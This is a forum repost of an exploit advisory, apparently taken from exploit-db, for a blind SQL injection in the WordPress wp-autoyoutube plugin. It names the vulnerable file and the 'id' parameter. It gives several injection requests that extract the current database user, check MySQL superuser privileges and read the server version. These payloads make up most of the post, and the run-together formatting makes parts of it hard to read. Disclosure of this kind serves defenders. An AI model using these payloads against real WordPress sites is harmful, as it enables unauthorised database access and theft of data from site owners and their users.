The_Arhitect Posted January 12, 2012 Report Posted January 12, 2012 ####################################################### Exploit Title: WordPress wp-autoyoutube plugin Blind SQL InjectionVulnerability# Date: 2012-11-01# Author: longrifle0x# software: Wordpress# Download:http://wordpress.org/extend/plugins/wp-autoyoutube/# Tools: SQLMAP######################################################*DESCRIPTIONDiscovered a vulnerability in wp-autoyoutube, Wordpress Plugin,vulnerability is Blind SQL injection.File:wp-content/plugins/wp-autoyoutube/modules/index.phpExploit: id=-1; or 1=if*Exploitation*http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASEWHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT0,1)='Y') THEN 1 ELSE 0 END)http://localhost:80/wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6)source: exploit-db.com Quote